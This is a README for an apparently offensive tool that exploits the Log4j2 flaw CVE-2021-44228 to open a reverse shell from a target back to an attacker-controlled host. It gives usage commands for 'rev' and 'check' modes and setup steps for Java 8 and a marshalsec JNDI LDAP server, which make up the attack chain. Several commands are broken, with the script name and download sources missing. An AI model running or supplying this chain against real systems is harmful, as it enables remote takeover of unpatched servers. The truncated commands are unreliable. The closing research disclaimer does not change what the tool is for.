# Log4j2-CVE-2021-44228-revshell

## Usage

    For reverse shell:
    $~ python3 -M rev -u -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]
    To check whether the target is exploitable:
    $~ python3 -M check -u -l [AttackerIP] -p [AttackerPort]

    $~  python3 -h
        usage: [-h] -M MODE -u TARGET -l LHOST -p LPORT
                                  [-hp HTTPPORT] [-V]

        Log4j2 CVE-2021-44228 Reverse Shell

        optional arguments:
          -h, --help            show this help message and exit
          -M MODE, --mode MODE  Mode: check | rev
          -u TARGET, --target TARGET
                                Target full URL,
          -l LHOST, --lhost LHOST
                                Attacker IP for receive revshell
          -p LPORT, --lport LPORT
                                Attacker port for receive revshell
          -hp HTTPPORT, --httpport HTTPPORT
                                HTTP server port on attacker host, default is 8888
          -V, --version         show program's version number and exit

## Requirements
    1. Marshalsec jndi.LDAPRefServer # see here,
    2. Java 8 # you can get Java 8 here,
       the suggested package is jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181]
    3. This script

## TL;DR: Guided steps
    $ Open a browser and download Java 8 from
      In the Java SE Development Kit 8u181 section, select jdk-8u181-linux-x64.tar.gz or the appropriate package for your OS.
    $ sudo mkdir /usr/lib/jvm # Create this directory if it does not exist yet
    $ cd /usr/lib/jvm
    $ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz # Extract the downloaded jdk-8u181-linux-x64.tar.gz into /usr/lib/jvm
    $ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
    $ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
    $ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

    $ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
    $ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
    $ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
    $ java -version # Verify that you are running Java 1.8.0_181
    $ git clone /tmp/Log4j2-dir; cd /tmp/Log4j2-dir # Install marshalsec jndi.LDAPRefServer
    $ sudo apt install -y maven # marshalsec is built with Maven; install it first if you do not have it
    $ mvn clean package -DskipTests # Build the marshalsec tool with Maven
    $ cd /tmp/Log4j2-dir; wget -q
    $ python3 -M rev -u -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

## PoC

    target host:
    attacker host:

## Tested on
    - Ubuntu 18.04

## Disclaimer:

    The script is for security analysis and research only, hence I would not be liable if it is used for illicit activities.